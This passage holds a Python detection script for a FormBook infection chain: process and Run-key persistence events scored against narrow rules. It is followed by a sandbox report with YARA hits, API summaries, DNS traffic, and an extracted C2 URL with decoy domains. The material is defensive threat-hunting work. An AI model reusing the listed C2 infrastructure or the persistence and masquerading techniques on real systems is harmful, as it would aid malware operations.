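value set) mirroring the process tree and Sigma hits above; the last record
is a constructed benign control. Rule names are assumptions.
"""
import re

EVENTS = [
    {"EventID": 1, "ProcessId": 7876,
     "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe"',
     "ParentImage": r"C:\Users\user\Desktop\M1Y6kc9FpE.exe"},
    {"EventID": 1, "ProcessId": 8084,
     "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc",
     "CommandLine": "oxhvi.msc bvqmcwxut.docx",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"EventID": 1, "ProcessId": 3360,
     "Image": r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc"},
    {"EventID": 1, "ProcessId": 5336,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\rundll32.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 13, "ProcessId": 7596,
     "Image": r"C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
     "Details": r"C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC"},
    # Constructed benign control: RegSvcs.exe from its real .NET location.
    {"EventID": 1, "ProcessId": 4242,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MyComponent.dll',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SHORTNAME_RE = re.compile(r"~\d+(?=\.|\s|$)")       # NTFS 8.3 names such as OXHVIM~1.EXE
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbe", ".vbs", ".jse", ".js", ".wsf")
EXEC_EXTS = {"exe", "dll", "com", "scr", "cpl"}
DOTNET_DIR = "c:\\windows\\microsoft.net\\"


def check_process(ev):
    """Rules for one EventID 1 record; returns the names of the rules that fired."""
    hits = []
    image = ev["Image"].lower()
    base = image.rsplit("\\", 1)[-1]
    ext = base.rsplit(".", 1)[-1] if "." in base else ""
    cmd = ev.get("CommandLine", "")
    if TEMP_RE.search(image):
        hits.append("image_in_temp")
    if ext not in EXEC_EXTS:                          # a PE running as .msc
        hits.append("non_exec_extension")
    if base in SCRIPT_HOSTS and TEMP_RE.search(cmd) \
            and cmd.lower().rstrip('" ').endswith(SCRIPT_EXTS):
        hits.append("script_host_from_temp")
    if base in {"regsvcs.exe", "regasm.exe"} and not image.startswith(DOTNET_DIR):
        hits.append("regsvcs_outside_dotnet")
    if base == "rundll32.exe" and cmd.strip().strip('"').lower() == image:
        hits.append("rundll32_no_args")
    return hits


def check_registry(ev):
    """Rules for one EventID 13 record: Run keys pointing into Temp or using 8.3 names."""
    hits = []
    if "\\currentversion\\run\\" in ev["TargetObject"].lower():
        details = ev.get("Details", "")
        if TEMP_RE.search(details):
            hits.append("run_key_to_temp")
        if SHORTNAME_RE.search(details):
            hits.append("run_key_short_name")
    return hits


def detect(events):
    """Return {ProcessId: sorted rule names} for every event that fired at least one rule."""
    findings = {}
    for ev in events:
        if ev["EventID"] == 1:
            hits = check_process(ev)
        elif ev["EventID"] == 13:
            hits = check_registry(ev)
        else:
            hits = []
        if hits:
            findings.setdefault(ev["ProcessId"], set()).update(hits)
    return {pid: sorted(h) for pid, h in findings.items()}


if __name__ == "__main__":
    for pid, hits in detect(EVENTS).items():
        print(pid, ", ".join(hits))
```

Each rule is deliberately narrow and none of them is sufficient alone; the value is that one short-lived chain triggers five of them (script host from Temp, PE with a non-executable extension, RegSvcs.exe outside the .NET directory, argument-less rundll32.exe, Run key with 8.3 short names into Temp), while the benign RegSvcs.exe invocation triggers none.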


AV Detection

Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.ybokiesite.online/o52o/"], "decoy": ["ckroom.xyz", "apanstock.online", "6dtd8.vip", "phone-in-installment-kz.today", "ichaellee.info", "mpresamkt38.online", "ivein.today", "78cx465vo.autos", "avannahholcomb.shop", "eochen008.top", "rcraft.net", "eth-saaae.buzz", "ifxz.info", "flegendarycap50.online", "reon-network.xyz", "ee.zone", "ameralife.net", "5en4.shop", "eal-delivery-34026.bond", "anion.app", "avada-ga-17.press", "inlinlong.top", "eal-estate-90767.bond", "opesclosetyork.net", "gormendonca.online", "ackyard-fence-grants.today", "acuum-cleaner-84638.bond", "martdataclient.sbs", "1r1f9bnfo4s4.top", "66hf918cz.autos", "lush-diamond.info", "ome-decor-10002.bond", "onceng77gacor.xyz", "ake-money-online-34699.bond", "wen-paaac.buzz", "mewtcp.xyz", "alyk.cloud", "overedplans.net", "igurisland-cruise-deals.today", "niverse-tech.net", "indseniorjob881.click", "rostitutkivladimiraslap.net", "inecraftpuro.net", "ames666.xyz", "arehouse-inventory-62571.bond", "infeng01.xyz", "jg-bw.app", "y09ypy.pro", "uratool.net", "4hamnghi.online", "j2g.xyz", "ental-health-54823.bond", "teplero.shop", "01595.xyz", "xs5.buzz", "elationship-coach-44953.bond", "heiritforum.buzz", "lladinco.online", "heheartofthehome.net", "uantumcircles.world", "ork-in-usa-60761.bond", "tonic.cafe", "agaglobalcapital.net", "eusvexk.shop"]}
Source: M1Y6kc9FpE.exe; ReversingLabs: Detection: 79%
Source: Yara match; File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: M1Y6kc9FpE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: M1Y6kc9FpE.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: M1Y6kc9FpE.exe, 00000000.00000003.1381988723.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp, M1Y6kc9FpE.exe, 00000000.00000003.1382771447.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: netsh.pdb source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A2F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_00A2F826
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A41630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW | 0_2_00A41630
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A51FF8 FindFirstFileExA | 0_2_00A51FF8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 8_2_0059E387
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 8_2_0059D836
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0059DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 8_2_0059DB69
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 8_2_005A9F9F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 8_2_005AA0FA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose | 8_2_005AA488
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005A65F1 FindFirstFileW,FindNextFileW,FindClose | 8_2_005A65F1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0056C642 FindFirstFileExW | 8_2_0056C642
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005A7248 FindFirstFileW,FindClose | 8_2_005A7248
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 8_2_005A72E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 4x nop then pop esi | 15_2_0041724B

              Networking

              Source: Malware configuration extractor | URLs: www.ybokiesite.online/o52o/
              Source: DNS query: www.reon-network.xyz
              Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:58145
              Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49706
              Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:58146
              Source: unknown | DNS traffic detected: query: www.arehouse-inventory-62571.bond replaycode: Name error (3)
              Source: unknown | DNS traffic detected: query: www.inlinlong.top replaycode: Name error (3)
              Source: unknown | DNS traffic detected: query: www.reon-network.xyz replaycode: Name error (3)
              Source: unknown | DNS traffic detected: query: 212.20.149.52.in-addr.arpa replaycode: Name error (3)
              Source: unknown | DNS traffic detected: query: www.lladinco.online replaycode: Name error (3)
              Source: unknown | DNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_005AD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent | 8_2_005AD7A1
              Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
              Source: global traffic | DNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
              Source: global traffic | DNS traffic detected: DNS query: www.arehouse-inventory-62571.bond
              Source: global traffic | DNS traffic detected: DNS query: www.lladinco.online
              Source: global traffic | DNS traffic detected: DNS query: www.inlinlong.top
              Source: global traffic | DNS traffic detected: DNS query: www.reon-network.xyz
